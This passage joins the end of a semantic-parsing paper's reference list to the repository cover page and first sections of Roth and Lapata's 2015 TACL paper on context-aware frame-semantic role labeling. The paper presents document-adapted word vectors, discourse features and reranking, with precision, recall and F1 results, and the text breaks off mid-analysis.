2013. Weakly su- pervised learning of semantic parsers for mapping instructions to actions. Transations of the Associ- ation for Computational Linguistics 1(1):49–62. Banarescu, Laura, Claire Bonial, Shu Cai, Madalina Georgescu, Kira Griffitt, Ulf Hermjakob, Kevin Knight, Philipp Koehn, Martha Palmer, and Nathan Schneider. 2013. Abstract meaning repre- sentation for sembanking. In Proceedings of the 7th Linguistic Annotation Workshop and Interop- erability with Discourse. Sofia, Bulgaria, pages 178–186. Berant, Jonathan, Andrew Chou, Roy Frostig, and Percy Liang. 2013. Semantic parsing on Freebase from question-answer pairs. In Proceedings of the 2013 Conference on Empirical Methods in Nat- ural Language Processing. Seattle, Washington, USA, pages 1533–1544. Berant, Jonathan and Percy Liang. 2014. Seman- tic parsing via paraphrasing. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics. Baltimore, Maryland, USA, pages 1415–1425. Bos, Johan, Stephen Clark, Mark Steedman, James R. Curran, and Julia Hockenmaier. 2004. Wide-coverage semantic representations from a ccg parser. In Proceedings of Coling 2004. Geneva, Switzerland, pages 1240–1246. Branavan, S.R.K., Harr Chen, Luke Zettlemoyer, and Regina Barzilay. 2009. Reinforcement learn- ing for mapping instructions to actions. In Pro- ceedings of the Joint Conference of the 47th An- nual Meeting of the ACL and the 4th International Joint Conference on Natural Language Process- ing of the AFNLP. Suntec, Singapore, pages 82– 90. Branavan, S.R.K., Nate Kushman, Tao Lei, and Regina Barzilay. 2012. Learning high-level plan- ning from text. In Proceedings of the 50th An- nual Meeting of the Association for Computa- tional Linguistics. Jeju Island, Korea, pages 126– 135. Cai, Qingqing and Alexander Yates. 2013. Large- scale semantic parsing via schema matching and lexicon extension. In Proceedings of the 51st Annual Meeting of the Association for Compu- tational Linguistics. Sofia, Bulgaria, pages 423– 433. Chen, David L. and Raymond J. Mooney. 2011. Learning to interpret natural language navigation instructions from observations. In Proceedings of the 25th AAAI Conference on Artificial Intelli- gence. San Francisco, California, pages 859–865. Clark, Stephen and James R Curran. 2004. Pars- ing the wsj using CCG and log-linear models. In Proceedings of the 42nd Annual Meeting on Asso- ciation for Computational Linguistics. Barcelona, Spain, pages 103–111. Clark, Stephen and James R Curran. 2007. Wide- coverage efficient statistical parsing with CCG and log-linear models. Computational Linguistics 33(4):493–552. Clark, Stephen, Julia Hockenmaier, and Mark Steed- man. 2002. Building deep dependency structures with a wide-coverage CCG parser. In Proceed- ings of the 40th Annual Meeting on Association for Computational Linguistics. pages 327–334. Clarke, James, Dan Goldwasser, Ming-Wei Chang, and Dan Roth. 2010. Driving semantic parsing from the world’s response. In Proceedings of the 14th Conference on Natural Language Learning. Uppsala, Sweden, pages 18–27. Collins, Michael. 2002. Discriminative training methods for Hidden Markov models: Theory and experiments with perceptron algorithms. In Proceedings of the 2002 Conference on Empir- ical Methods in Natural Language Processing. Philadelphia, Pennsylvania, pages 1–8. Fader, Anthony, Luke Zettlemoyer, and Oren Et- zioni. 2013. Paraphrase-driven learning for open question answering. In Proceedings of the 51st Annual Meeting of the Association for Computa- tional Linguistics. Sofia, Bulgaria, pages 1608– 1618. Gabrilovich, Evgeniy, Michael Ringgaard, and Amarnag Subramanya. 2013. FACC1: Freebase annotation of ClueWeb corpora, Version 1 (Re- lease date 2013-06-26, Format version 1, Correc- tion level 0). Goldwasser, Dan, Roi Reichart, James Clarke, and Dan Roth. 2011. Confidence driven unsupervised semantic parsing. In Proceedings of the 49th Annual Meeting of the Association for Compu- tational Linguistics: Human Language Technolo- gies. Portland, Oregon, USA, pages 1486–1495. Goldwasser, Dan and Dan Roth. 2011. Learning from natural instructions. In Proceedings of the 22nd International Joint Conference on Artificial Intelligence. Barcelona, Spain, pages 1794–1800. Hoffmann, Raphael, Congle Zhang, Xiao Ling, Luke S Zettlemoyer, and Daniel S Weld. 2011. Knowledge-based weak supervision for informa- tion extraction of overlapping relations. In Pro- ceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics: Human Language Technologies. Portland, Oregon, USA, pages 541–550. Krishnamurthy, Jayant and Thomas Kollar. 2013. Jointly learning to parse and perceive: Connect- ing natural language to the physical world. Tran- sations of the Association for Computational Lin- guistics 1(1):193–206. Krishnamurthy, Jayant and Tom Mitchell. 2012. Weakly supervised training of semantic parsers. In Proceedings of the 2012 Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learn- ing. Jeju Island, Korea, pages 754–765. Kwiatkowski, Tom, Eunsol Choi, Yoav Artzi, and Luke Zettlemoyer. 2013. Scaling semantic parsers with on-the-fly ontology matching. In Proceed- ings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing. Seattle, Washington, USA, pages 1545–1556. Kwiatkowski, Tom, Luke Zettlemoyer, Sharon Goldwater, and Mark Steedman. 2010. Inducing probabilistic CCG grammars from logical form with higher-order unification. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing. pages 1223–1233. Lewis, Mike and Mark Steedman. 2013. Combined distributional and logical semantics. Transactions of the Association for Computational Linguistics 1:179–192. Liang, Percy, Michael Jordan, and Dan Klein. 2011. Learning dependency-based compositional se- mantics. In Proceedings of the 49th Annual Meet- ing of the Association for Computational Linguis- tics: Human Language Technologies. Portland, Oregon, USA, pages 590–599. Matuszek, Cynthia, Nicholas FitzGerald, Luke Zettlemoyer, Liefeng Bo, and Dieter Fox. 2012. A joint model of language and perception for grounded attribute learning. In Proceedings of the 29th International Conference on Machine Learn- ing. Edinburgh, Scotland, pages 1671–1678. Mintz, Mike, Steven Bills, Rion Snow, and Dan Jurafsky. 2009. Distant supervision for relation extraction without labeled data. In Proceedings of the Joint conference of the 47th Annual Meet- ing of the Association for Computational Linguis- tics and the 4th International Joint Conference on Natural Language Processing of the Asian Fed- eration of Natural Language Processing. pages 1003–1011. Parsons, Terence. 1990. Events in the Semantics of English. MIT Press, Cambridge, MA. Poon, Hoifung. 2013. Grounded unsupervised se- mantic parsing. In Proceedings of the 51st An- nual Meeting of the Association for Computa- tional Linguistics. Sofia, Bulgaria, pages 933– 943. Riedel, Sebastian, Limin Yao, Andrew McCallum, and Benjamin M Marlin. 2013. Relation ex- traction with matrix factorization and universal schemas. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies. Atlanta, Georgia, pages 74–84. Steedman, Mark. 2000. The Syntactic Process. The MIT Press. Wong, Yuk Wah and Raymond Mooney. 2007. Learning synchronous grammars for semantic parsing with lambda calculus. In Proceedings of the 45th Annual Meeting of the Association of Computational Linguistics. Prague, Czech Re- public, pages 960–967. Yao, Xuchen and Benjamin Van Durme. 2014. In- formation extraction over structured data: Ques- tion answering with freebase. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics. Baltimore, Maryland, USA, pages 956–966. Zelle, John M and Raymond J Mooney. 1996. Learning to parse database queries using induc- tive logic programming. In Proceedings of the National Conference on Artificial Intelligence. Portland, Oregon, pages 1050–1055. Zettlemoyer, Luke and Michael Collins. 2007. On- line learning of relaxed CCG grammars for pars- ing to logical form. In Proceedings of the 2007 Joint Conference on Empirical Methods in Natu- ral Language Processing and Computational Nat- ural Language Learning. Prague, Czech Repub- lic, pages 678–687. Zettlemoyer, Luke S. and Michael Collins. 2005. Learning to map sentences to logical form: Struc- tured classification with probabilistic categorial grammars. In Proceedings of 21st Conference in Uncertainilty in Artificial Intelligence. Edin- burgh, Scotland, pages 658–666. work_i6lb576gyjb35noib34kxoed2e ---- Edinburgh Research Explorer Context-aware Frame-Semantic Role Labeling Citation for published version: Roth, M & Lapata, M 2015, 'Context-aware Frame-Semantic Role Labeling', Transactions of the Association for Computational Linguistics, vol. 3, pp. 449-460. <https://tacl2013.cs.columbia.edu/ojs/index.php/tacl/article/view/652> Link: Link to publication record in Edinburgh Research Explorer Document Version: Publisher's PDF, also known as Version of record Published In: Transactions of the Association for Computational Linguistics General rights Copyright for the publications made accessible via the Edinburgh Research Explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. Take down policy The University of Edinburgh has made every reasonable effort to ensure that Edinburgh Research Explorer content complies with UK legislation. If you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. Download date: 06. Apr. 2021 https://tacl2013.cs.columbia.edu/ojs/index.php/tacl/article/view/652 https://www.research.ed.ac.uk/portal/en/publications/contextaware-framesemantic-role-labeling(110f80eb-8701-4638-8998-e38efcb6d50e).html Context-aware Frame-Semantic Role Labeling Michael Roth and Mirella Lapata School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB {mroth,mlap}@inf.ed.ac.uk Abstract Frame semantic representations have been useful in several applications ranging from text-to-scene generation, to question answer- ing and social network analysis. Predicting such representations from raw text is, how- ever, a challenging task and corresponding models are typically only trained on a small set of sentence-level annotations. In this pa- per, we present a semantic role labeling sys- tem that takes into account sentence and dis- course context. We introduce several new fea- tures which we motivate based on linguistic insights and experimentally demonstrate that they lead to significant improvements over the current state-of-the-art in FrameNet-based se- mantic role labeling. 1 Introduction The goal of semantic role labeling (SRL) is to iden- tify and label the arguments of semantic predicates in a sentence according to a set of predefined re- lations (e.g., “who” did “what” to “whom”). In addition to providing definitions and examples of role labeled text, resources like FrameNet (Ruppen- hofer et al., 2010) group semantic predicates into so- called frames, i.e., conceptual structures describing the background knowledge necessary to understand a situation, event or entity as a whole as well as the roles participating in it. Accordingly, semantic roles are defined on a per-frame basis and are shared among predicates. In recent years, frame representations have been successfully applied in a range of downstream tasks, including question answering (Shen and Lapata, 2007), text-to-scene generation (Coyne et al., 2012), stock price prediction (Xie et al., 2013), and so- cial network extraction (Agarwal et al., 2014). Whereas some tasks directly utilize information encoded in the FrameNet resource, others make use of FrameNet indirectly through the output of SRL systems that are trained on data annotated with frame-semantic representations. While ad- vances in machine learning have recently given rise to increasingly powerful SRL systems follow- ing the FrameNet paradigm (Hermann et al., 2014; Täckström et al., 2015), little effort has been devoted to improve such models from a linguistic perspec- tive. In this paper, we explore insights from the lin- guistic literature suggesting a connection between discourse and role labeling decisions and show how to incorporate these in an SRL system. Although early theoretical work (Fillmore, 1976) has recog- nized the importance of discourse context for the assignment of semantic roles, most computational approaches have shied away from such considera- tions. To see how context can be useful, consider as an example the DELIVERY frame, which states that a THEME can be handed off to either a RECIPIENT or “more indirectly” to a GOAL. While the distinc- tion between the latter two roles might be clear for some fillers (e.g., people vs. locations), there are oth- ers where both roles are equally plausible and addi- tional information is required to resolve the ambigu- ity (e.g., countries). If we hear about a letter being delivered to Greece, for instance, reliable cues might be whether the sender is a person or a country and 449 Transactions of the Association for Computational Linguistics, vol. 3, pp. 449–460, 2015. Action Editor: Diana McCarthy. Submission batch: 5/2015; Revision batch 7/2015; Published 8/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. whether Greece refers to the geographic region or to the Greek government. The example shows that context can generally in- fluence the choice of correct role label. Accordingly, we assume that modeling contextual information, such as the meaning of a word in a given situation, can improve semantic role labeling performance. To validate this assumption, we explore different ways of incorporating contextual cues in a SRL model and provide experimental support that demonstrates the usefulness of such additional information. The remainder of this paper is structured as fol- lows. In Section 2, we present related work on se- mantic role labeling and the various features applied in traditional SRL systems. In Section 3, we provide additional background on the FrameNet resource. Sections 4 and 5 describe our baseline system and contextual extensions, respectively, and Section 6 presents our experimental results. We conclude the paper by discussing in more detail the output of our system and highlighting avenues for future work. 2 Related Work Early work in SRL dates back to Gildea and Juraf- sky (2002), who were the first to model role assign- ment to verb arguments based on FrameNet. Their model makes use of lexical and syntactic features, including binary indicators for the words involved, syntactic categories, dependency paths as well as po- sition and voice in a given sentence. Most subse- quent work in SRL builds on Gildea and Jurafsky’s feature set, often with the addition of features that describe relevant syntactic structures in more de- tail, e.g., the argument’s leftmost/rightmost depen- dent (Johansson and Nugues, 2008). More sophisticated features include the use of convolution kernels (Moschitti, 2004; Croce et al., 2011) in order to represent predicate-argument structures and their lexical similarities more accu- rately. Beyond lexical and syntactic information, a few approaches employ additional semantic fea- tures based on annotated word senses (Che et al., 2010) and selectional preferences (Zapirain et al., 2013). Deschacht and Moens (2009) and Huang and Yates (2010) use sentence-internal sequence in- formation, in the form of latent states in a hidden markov model. More recently, a few approaches (Roth and Woodsend, 2014; Lei et al., 2015; Foland and Martin, 2015) explore ways of using low-rank vector and tensor approximations to represent lex- ical and syntactic features as well as combinations thereof. To the best of our knowledge, there exists no prior work where features based on discourse con- text are used to assign roles on the sentence level. Discourse-like features have been previously ap- plied in models that deal with so-called implicit ar- guments, i.e., roles which are not locally realized but resolvable within the greater discourse context (Ruppenhofer et al., 2010; Gerber and Chai, 2012). Successful features for resolving implicit arguments include the distance between mentions and any dis- course relations occurring between them (Gerber and Chai, 2012), roles assigned to mentions in the previous context, the discourse prominence of the denoted entity (Silberer and Frank, 2012), and its centering status (Laparra and Rigau, 2013). None of these features have been used in a standard SRL system to date (and trivially, not all of them will be helpful as, for example, the number of sentences be- tween a predicate and an argument is always zero within a sentence). In this paper, we extend the contextual features used for resolving implicit ar- guments to the SRL task and show how a set of discourse-level enhancements can be added to a tra- ditional sentence-level SRL model. 3 FrameNet The Berkeley FrameNet project (Ruppenhofer et al., 2010) develops a semantic lexicon and an annotated example corpus based on Fillmore’s (1976) theory of frame semantics. Annotations consist of frame- evoking elements (i.e., words in a sentence that are associated with a conceptual frame) and frame ele- ments (i.e., instantiations of semantic roles, which are defined per frame and filled by words or word sequences in a given sentence). For example, the DELIVERY frame describes a scene or situation in which a DELIVERER hands off a THEME to a RE- CIPIENT or a GOAL.1 In total, there are 1,019 frames and 8,886 frame elements defined in the lat- 1See https://framenet2.icsi.berkeley.edu/ for a comprehensive list of frames and their definitions. 450 est publicly available version of FrameNet.2 An av- erage number of 11.6 different frame-evoking ele- ments are provided for each frame (11,829 in total). Following previous work on FrameNet-based SRL, we use the full text annotation data set, which con- tains 23,087 frame instances. Semantic annotations for frame instances and fillers of frame elements are generally provided at the level of word sequences, which can be single words, complete or incomplete phrases, and entire clauses (Ruppenhofer et al., 2010, Chapter 4). An instance of the DELIVERY frame, with annotations of the frame-evoking element (underlined) and in- stantiated frame elements (in brackets), is given in the example below: (1) The Soviet Union agreed to speed up [oil]THEME deliveriesDELIVERY [to Yugoslavia]RECIPIENT . Note that the oil deliveries here concern Yugoslavia as a geopolitical entity and hence the RECIPIENT role is assigned. If Yugoslavia was referred to as the location of a delivery, the GOAL role would be assigned instead. In general, roles can be restricted by so-called semantic types (e.g., every filler of the THEME element in the DELIVERY frame needs to be a physical object). However, not all roles are typed and whether a specific phrase is a suitable filler largely depends on context. 4 Baseline Model As a baseline for implementing contextual enhance- ments to an SRL model, we use the semantic role labeling components provided by the mate-tools (Björkelund et al., 2010). Given a frame-evoking el- ement in a sentence and its associated frame (i.e., a predicate and its sense), the mate-tools form a pipeline of logistic regression classifiers that iden- tify and label frame elements which are instantiated within the same sentence (i.e., a given predicate’s arguments). The adopted SRL system has been developed for PropBank/NomBank-style role labeling and we make several changes to adapt it to FrameNet. Specifically, we change the argument labeling pro- cedure from predicate-specific to frame-specific 2Version 1.5, released September 2010. roles and implement I/O methods to read and gen- erate FrameNet XML files. For direct compari- son with the previous state-of-the-art for FrameNet- based SRL, we further implement additional fea- tures used in the SEMAFOR system (Das et al., 2014) and combine the role labeling compo- nents of mate-tools with SEMAFOR’s preprocess- ing toolchain.3 All features used in our system are listed in Table 1. The main differences between our adaptation of mate-tools and SEMAFOR are as follows: whereas the latter implements identification and labeling of role fillers in one step, mate-tools follow the in- sight that these two steps are conceptually differ- ent (Xue and Palmer, 2004) and should be modeled separately. Accordingly, mate-tools contain a global reranking component which takes into account iden- tification and labeling decisions while SEMAFOR only uses reranking techniques to filter overlapping argument predictions and other constraints (see Das et al., 2014 for details). We discuss the advantage of a global reranker for our setting in Section 5. 5 Extensions based on Context Context can be relevant for semantic role labeling in various different ways. In this section, we moti- vate and describe four extensions over previous ap- proaches. The first extension is a set of features that model document-specific aspects of word meaning using distributional semantics. The motivation for this fea- ture class stems from the insight that the meaning of a word in context can influence correct role assign- ment. While concepts such as polysemy, homonymy and metonymy are all relevant here, the scarce train- ing data available for FrameNet-based SRL calls for a light-weight model that can be applied without large amounts of labeled data. We therefore employ distributional word representations which we criti- cally adapt based on document content. We describe our contribution in Section 5.1. Entities that fill semantic roles are sometimes mentioned in discourse. Given a specific mention 3We note that better results have been reported in Hermann et al. (2014) and Täckström et al. (2015). However, both of these more recent approaches rely on a custom frame identifi- cation component as well as proprietary tools and models for tagging and parsing which are not publicly available. 451 Argument identification and classification Lemma form of f POS tag of f Any syntactic dependents of f* Subcat frame of f* Voice of a* Any lemma in a* Number of words in a First word and POS tag in a Second word and POS tag in a Last word and POS tag in a Relation from first word in a to its parent Relation from second word in a to its parent Relation from last word in a to its parent Relative position of a with respect to p Voice of a and relative position with respect to p* Identification only Lemma form of the first word in a Lemma form of the syntactic head of a Lemma form of the last word in a POS tag of the first word in a POS tag of the syntactic head of a POS tag of the last word in a Relation from syntactic head of a to its parent Dependency path from a to f Length of dependency path from a to f Number of words between a and f Table 1: Features from Das et al. (2014) which we adopt in our model; a denotes the argument span under con- sideration, f refers to the corresponding frame evoking element. Identification features are instantiated as binary indicator features. Features marked with an asterisk are role specific. All other features apply to combinations of role and frame. for which a role is to be predicted, we can also di- rectly use previous role assignments as classification cues. We describe our implementation of this feature in Section 5.2. The filler of a semantic role is often a word or phrase which occurs only once or a few times in a document. If neither syntax nor aspects of lexi- cal meaning provide cues indicating a unique role, useful information can still be derived from the dis- course salience of the denoted entity. Our model makes use of a simple salience indicator that can be reliably derived from automatically computed coref- erence chains. We describe the motivation and ac- tual implementation of this feature in Section 5.3. The aforementioned features will influence role labeling decisions directly, however, further im- provements can be gained by considering interac- tions between labeling decisions. As discussed in Das et al. (2014), role annotations in FrameNet are unique with respect to a frame instance in more than 96% of cases. This means that even if a feature is not a positive indicator for a candidate role filler, knowing it would be a better cue for another can- didate can also prevent a hypothetical model from assigning a frame element label incorrectly. While this kind of knowledge has been successfully im- plemented as constraints in recent FrameNet-based SRL models (Hermann et al., 2014; Täckström et al., 2015), earlier work on PropBank-based role label- ing suggests that better performance can be achieved with a re-ranking component which has the poten- tial to learn such constraints and other interactions implicitly (Toutanova et al., 2005; Björkelund et al., 2010). In our model, we adopt the latter method and extend it with additional frame-based features. We describe this approach in more detail in Section 5.4. 5.1 Modeling Word Meaning in Context The underlying idea of distributional models of se- mantics is that meaning can be acquired based on distributional properties (typically represented by co-occurrence counts) of linguistic entities such as words and phrases (Sahlgren, 2008). Although the absolute meaning of distributional representations remains unclear, they have proven highly success- ful for modeling relative aspects of meaning, as re- quired for instance in word similarity tasks (Mikolov et al., 2013; Pennington et al., 2014). Given their ability to model lexical similarity, it is not surpris- ing that such representations are also successful at representing similar words in semantic tasks related to role labeling (Pennacchiotti et al., 2008; Croce et al., 2010; Zapirain et al., 2013). Although distributional representations can be used directly as features for role labeling (Padó et al., 2008; Gorinski et al., 2013; Roth and Wood- send, 2014, inter alia), further gains should be possi- ble when considering document-specific properties such as genre and context. This is particularly true in the context of FrameNet, where different senses are observed across a diverse range of texts includ- ing spoken dialogue and debate transcripts as well 452 Country Frame Frame Element Iran Supply RECIPIENT Commerce buy BUYER China Supply SUPPLIER Commerce sell SELLER Iraq Locative relation GROUND Arriving GOAL Table 2: Most frequent roles assigned to country names appearing FrameNet texts: whereas Iran and China are mostly mentioned in an economic context, references to Iraq are mainly found in a news article about a politician’s visit to the country. as travel guides and newspaper articles. Country names, for example, can be observed as fillers for different roles depending on the text genre and its perspective. Whereas some text may talk about a country as an interesting holiday destination (e.g., “Berlitz Intro to Jamaica”), others may discuss what a country is good at or interested in (e.g., “Iran [Nu- clear] Introduction”). A list of the most frequent roles assigned to different country names are dis- played in Table 2. Previous approaches model word meaning in con- text (Thater et al., 2010; Dinu and Lapata, 2010, in- ter alia) using sentence-level information which is already available in traditional SRL systems in the form of explicit features. Here, we go one step fur- ther and define a simple model in which word mean- ing representations are adapted to each document. As a starting point, we use the GloVe toolkit (Pen- nington et al., 2014) for learning representations4 and apply it to the Wikipedia corpus made available by the Westbury Lab.5 The learned representations can be seen as word vectors whose components en- code basic bits of related encyclopaedic knowledge. We adapt these general representations to the ac- tual meaning of a word in a particular text by run- ning additional iterations of the GloVe toolkit us- ing document-specific co-occurrences as input and Wikipedia-based representations for initialization. 4We selected this toolkit in our work due to its flexibility: as it directly operates over co-occurrence matrices, we can manip- ulate counts prior to word vector computation and easily take into account multiple matrices. 5 http://www.psych.ualberta.ca/˜westburylab/ downloads/westburylab.wikicorp.download.html To make up for the large difference in data size be- tween the Wikipedia corpus and a single document, we normalize co-occurrence counts based on the ra- tio between the absolute numbers of co-occurrences in both resources. Given co-occurrence matrices Cwiki and Cd, and the vocabulary V , we formally define the features of our SRL model as the components of the vec- tor space ~wi of words wi (1 ≤ i ≤ |V |) occurring in document d. The representations are learned by applying GloVe to optimize the following objective for n iterations (1 ≤ t ≤ n): Jt = ∑ i,j f(Xij)(~w T i ~wj − logXij)2, (2) where X = { Cwiki if t < td Cd otherwise (3) The weighting function f scales the impact of each word pair such that unseen pairs do not contribute to the overall objective and frequent co-occurrences are not overweighted. In our experiments, we use the same weighting function and parametrization as defined in Pennington et al. (2014). We further set the number of iterations to be performed on each co-occurrence matrix following results of an ini- tial cross-validation experiment on our training data (td = 50, n = 100). 5.2 Co-occurring Roles If an entity is mentioned several times in discourse, it is likely that it also fills several roles. Whereas the distributional model described in Section 5.1 provides us with information regarding the role as- signments suitable for an entity given co-occurring words, we can also can explicitly consider previous role assignments to the same entity. As shown in Table 2, a country that fills the SUPPLIER role is more likely to also fill the role of a SELLER than that of a BUYER. Given the high number of different frame elements in FrameNet, only a small fraction of pairs can be found in the training data, which entails that directly utilizing role co-occurrences might not be helpful. In order to benefit from previous role assignments in discourse, we follow related work on resolving implicit arguments (Ruppenhofer et al., 2011; Silberer and Frank, 2012) and consider the se- mantic types of role assignments (see Section 3) as 453 http://www.psych.ualberta.ca/~westburylab/downloads/westburylab.wikicorp.download.html http://www.psych.ualberta.ca/~westburylab/downloads/westburylab.wikicorp.download.html features instead of the role labels themselves. This tremendously reduces the feature space from more than 8,000 options (number of defined frame ele- ments) to just 27 (number of semantic types ob- served for frame elements in the training data). In practice, we define one binary indicator fea- ture fs for each semantic type s observed at train- ing time. Given a potential filler, we set the feature value of fs to 1 (otherwise 0) if and only if there ex- ists a co-referent entity mention annotated as a frame element filler with semantic type s. Since texts in FrameNet do not contain any manual mark-up of coreference relations, we rely on entity mentions and coreference chains predicted by the Stanford Coreference Resolution system (Lee et al., 2013). 5.3 Discourse Newness Our third contextual feature type is based on the observation that the salience of a discourse entity and its semantic prominence are interrelated. Previ- ous work (Rose, 2011) showed that semantic promi- nence, as signal-led by semantic roles, can better explain subsequent phenomena related to discourse salience (such as pronominalization) than syntactic indicators. Our question here is whether this insight can be also applied in reverse. Can information on discourse salience be useful as an indicator for se- mantic roles? For this feature, we make use of the same coref- erence chains as predicted for determining co- occurring roles. Unfortunately, automatically pre- dicted mentions and coreference chains are noisy. To identify particularly reliable indicators for dis- course salience, we inspected held-out development data. One such indicator is whether an entity is men- tioned for the first time (discourse-new) or has been mentioned before (discourse-old). Let w denote an entity and R1...Rn the set of all co-reference chains with mentions r1...rm ∈ Ri (1 ≤ i ≤ n) ordered by their appearance in text. We define discourse newness based on head words r.head as: (4)new(w) = { 0 if ∃rj ∈ Ri : j > 1∧rj.head ≡ w 1 else Although this feature is a simple binary indicator, it can be very useful for distinguishing between roles that are more or less likely to be assigned to new Frame Frame Element new/old Statement SPEAKER 43.8 MESSAGE 99.1 MEDIUM 80.0 Leadership LEADER 78.0 GOVERNED 93.4 Intensionally create CREATOR 58.8 CREATED ENTITY 90.1 Table 3: Frequent frames that have elements with differ- ent likelihoods of discourse-new vs. discourse-old fillers; new/old ratios as observed on the development set. entities. For example, it is easy to imagine that the RESULT of a CAUSATION is more likely to be discourse-new than the EFFECT that caused it. Ta- ble 3 provides an overview of frames found in the training and development data which have roles with substantially different likelihoods for discourse-new fillers. 5.4 Frame-based Reranking Our goal is to learn a better model for FrameNet- based semantic role labeling using linguistically in- spired features such as those described in the previ- ous sections. To do this, we need a framework for representing single role assignments and a model of how such assignments depend on each other within a frame instance. Inspired by previous work on reranking in SRL, we assume that we can find the correct filler of a frame element based on the top k roles predicted for each candidate word sequence. We leverage this assumption to train a reranking model that considers the top predictions for each candidate and uses all relevant features to select the best overall structure. Our implementation of the reranking model is an adaptation of the reranker made available in the mate-tools (see Section 4), which we extend to deal with frame-specific features and arbitrary role la- bels. As features for the global component, we apply all local features and additionally use the following two types of indicator features on the whole frame structure: • Total number of roles in the predicted structure • Ordered set of predicted role labels 454 Frames SRL model P R F1 gold SEMAFOR7 78.4 73.1 75.7∗ gold Framat 80.3 71.7 75.8∗ gold Framat+context 80.4 73.0 76.5 SEMAFOR SEMAFOR 69.2 65.1 67.1∗ SEMAFOR Framat 71.1 63.7 67.2∗ SEMAFOR Framat+context 71.1 64.8 67.8 Table 4: Full structure prediction results using gold (top) and predicted frames (bottom). All numbers are per- centages. ∗ Significantly different (p<0.05) from Framat+context. At test time, the reranker takes as input the n-best la- bels for the m-best fillers of a frame structure, com- putes a global score for each of the n × m possible combinations and returns the structure with the high- est overall score as its prediction output. Based on initial experiments on our training data, we set these parameters to m = 8 and n = 4. 6 Experiments In this section, we demonstrate the usefulness of contextual features for FrameNet-based SRL mod- els. Our hypothesis is that contextual information can considerably improve an existing semantic role labeling system. Accordingly, we test this hypothe- sis based on the output of three different systems. The first system, henceforth called Framat (short for FrameNet-adapted mate-tools) is the baseline system described in Section 4. The second sys- tem, henceforth Framat+context, is an enhanced ver- sion of the baseline that additionally uses all exten- sions described in Section 5. Finally, we also con- sider the output of SEMAFOR (Das et al., 2014), a state-of-the-art model for frame-semantic role label- ing. Although all systems are provided with entire documents as input, SEMAFOR and Framat pro- cess each document sentence-by-sentence whereas Framat+context also uses features over all sentences. For evaluation, we use the same FrameNet train- ing and evaluation texts as established in Das and Smith (2011). We compute precision, recall and F1-score using the modified SemEval-2007 scorer from the SEMAFOR website.6 6http://www.ark.cs.cmu.edu/SEMAFOR/eval/ 7Results produced by running SEMAFOR on the exact same Model/added feature P R F1 Framat w/o reranker 77.5 72.5 74.9 +discourse newness 77.6 72.3 74.9 +word meaning vectors 77.9 72.7 75.2 +cooccurring roles 77.9 72.8 75.3 +reranker 80.6 72.7 76.4 +frame structure 80.4 73.0 76.5 Table 5: Full structure prediction results using gold frames, Framat and different sets of context features. All numbers are percentages. Results Table 4 summarizes our results with Fra- mat, Framat+context, and SEMAFOR using gold and predicted frames (see the upper and lower half of the table, respectively). Although differences in system architecture lead to different precision/recall trade-offs for Framat and SEMAFOR, both sys- tems achieve comparable F1 (for both gold and pre- dicted frames). Compared to Framat, we can see that the contextual enhancements implemented in our Framat+context model lead to immediate gains of 1.3 points in recall, corresponding to a signifi- cant increase of 0.7 points in F1. Framat+context’s re- call is slightly below that of SEMAFOR (73.0% vs. 73.1%), however, it achieves a much higher level of precision (80.4% vs. 78.4%). We examined whether differences in performance among the three systems are significant using an ap- proximate randomization test over sentences (Yeh, 2000). SEMAFOR and Framat perform signifi- cantly worse (p<0.05) compared to Framat+context both when gold and predicted frames are used. In the remainder of this section we discuss results based on gold frames, since the focus of this work lies primar- ily on the role labeling task. Impact of Individual Features We demonstrate the effect of adding individual context-based fea- tures to the Framat model in a separate experiment. Whereas all models in the previous experiment used a reranker for direct comparability, here we start with the Framat baseline (without a reranker) and add each enhancement described in Section 5 in- crementally. As summarized in Table 5, the base- line without a reranker achieves a precision and frame instances for training and testing as our own models. 455 http://www.ark.cs.cmu.edu/SEMAFOR/eval/ recall of 77.5% and 72.5%, respectively. Addi- tion of our discourse new feature increases pre- cision (+0.1%), but also reduces recall (−0.2%). Adding word meaning vectors compensates for the loss in recall (+0.4%) and further increases preci- sion (+0.3%). Information about role assignments to coreferring mentions increases recall (+0.1%) while retaining the same level of precision. Finally, we can see that jointly considering role labeling decisions in a global reranker with additional fea- tures on frame structure leads to the strongest boost in performance, with combined additional gains in precision and recall of +2.5% and +0.2%, respec- tively. Interestingly, the gains realized here are much higher compared to when adding the reranker to the Framat model without contextual features, which corresponds to a +2.8% increase in precision but a −0.8% reduction in recall. General vs. Document-specific Vectors We also assessed the impact of adapting vectors to docu- ments (see Table 6). Specifically, we compared a version of the Framat+context model without any vectors against a model using the adaptation tech- nique presented in Section 5.1 and a simpler alterna- tive which obtains GloVe representations trained on the Wikipedia corpus and FrameNet texts. The lat- ter model does not explicitly take document infor- mation into account, but it should be able to yield vectors representative of the FrameNet domains, merely by being trained on them. As shown in Ta- ble 6, our adaptation technique is superior to learn- ing word representations based on Wikipedia and all FrameNet texts at once. Using the components of document-specific vectors as features improves precision and recall by +0.7 percentage points over Framat+context without vectors. Word representations trained on Wikipedia and FrameNet improve preci- sion by +0.2 percentage points and recall by +0.6. Qualitative Improvements In addition to quanti- tative gains, we also observe qualitative improve- ments when considering contextual features. A set of example predictions by different models are listed in Table 7. The annotations show that Framat and SEMAFOR mislabel several cases that are correctly classified by Framat+context. In the first example, only Framat+context is able to predict that on Dec. 1 fills the frame element Model/word representations P R F1 Framat+context without vectors 79.7 72.2 75.8 +document-specific vectors 80.4 73.0 76.5 +general (Wiki+FN) vectors 79.9 72.8 76.2 Table 6: Full structure prediction results using gold frames, Framat+context and different vector representa- tions. All numbers are percentages. TIME. This may seem trivial at first glance but is actually remarkable as the word token Dec neither occurs in the training data nor is well represented as a time expression in Wikipedia. The only way the model is able to label this phrase correctly is by finding that corresponding word tokens are sim- ilarly distributed across the test document as other time expressions are in the training data. In the second and third examples, correct 